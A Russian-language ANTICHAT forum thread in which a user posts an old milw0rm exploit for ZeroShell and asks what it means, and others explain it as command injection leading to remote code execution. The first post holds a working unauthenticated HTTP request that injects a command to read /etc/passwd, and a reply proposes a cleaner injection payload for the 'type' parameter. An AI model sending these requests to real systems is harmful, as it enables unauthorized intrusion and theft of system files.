HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
Перезагрузить страницу Эксплуатация.
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 25.03.2016, 14:34
Bezlishke
Новичок
Регистрация: 18.05.2015
Сообщений: 26
С нами: 5784086

Репутация: 3
По умолчанию
Код:
====================================================
ZeroShell ;%22
  
In addition to the Unix commands, it is possible to abuse the
ZeroShell scripts themself. For instance it is likely to use the
"getkey" script in order to retrieve remote files, including the content
in the html page.
  
{HTTP REQUEST}
GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;
/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22 HTTP/1.1
Host: 
# milw0rm.com [2009-02-09]
Заинтересовало, но не могу одуплить.
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 25.03.2016, 14:43
t0ma5
Постоянный
Регистрация: 10.02.2012
Сообщений: 830
С нами: 7502006

Репутация: 90


По умолчанию
Цитата:
Сообщение от Bezlishke  

Код:
====================================================
ZeroShell ;%22
 
In addition to the Unix commands, it is possible to abuse the
ZeroShell scripts themself. For instance it is likely to use the
"getkey" script in order to retrieve remote files, including the content
in the html page.
 
{HTTP REQUEST}
GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;
/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22 HTTP/1.1
Host: 
# milw0rm.com [2009-02-09]
Заинтересовало, но не могу одуплить.
староватая конечно бага)

поле type участвует судя по всему в какой то баш команде, то есть

$ blablabla "blabla $type"

из за плохой фильтрации можно сделать инъекцию вида ";наша команда

%22 это как раз знак "

пайлоад у них правда странный *%22;;%22

имхо лучше так *%22;cmd;%23
 
Ответить с цитированием

  #3  
Старый 25.03.2016, 16:04
BabaDook
Познавший АНТИЧАТ
Регистрация: 09.05.2015
Сообщений: 1,066
С нами: 5797046

Репутация: 40


По умолчанию
Цитата:
Сообщение от t0ma5  

староватая конечно бага)
поле type участвует судя по всему в какой то баш команде, то есть
$ blablabla "blabla $type"
из за плохой фильтрации можно сделать инъекцию вида ";наша команда
%22 это как раз знак "
пайлоад у них правда странный *%22;;%22
имхо лучше так *%22;cmd;%23
Команд ИНЖ. хотя не, РЦЕ. Суть вопроса не понятна только
 
Ответить с цитированием

  #4  
Старый 25.03.2016, 16:18
t0ma5
Постоянный
Регистрация: 10.02.2012
Сообщений: 830
С нами: 7502006

Репутация: 90


По умолчанию
Цитата:
Сообщение от BabaDook  

Команд ИНЖ. хотя не, РЦЕ. Суть вопроса не понятна только
так это не вопрос, а ответ был) чел выше спрашивал что эта такое
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.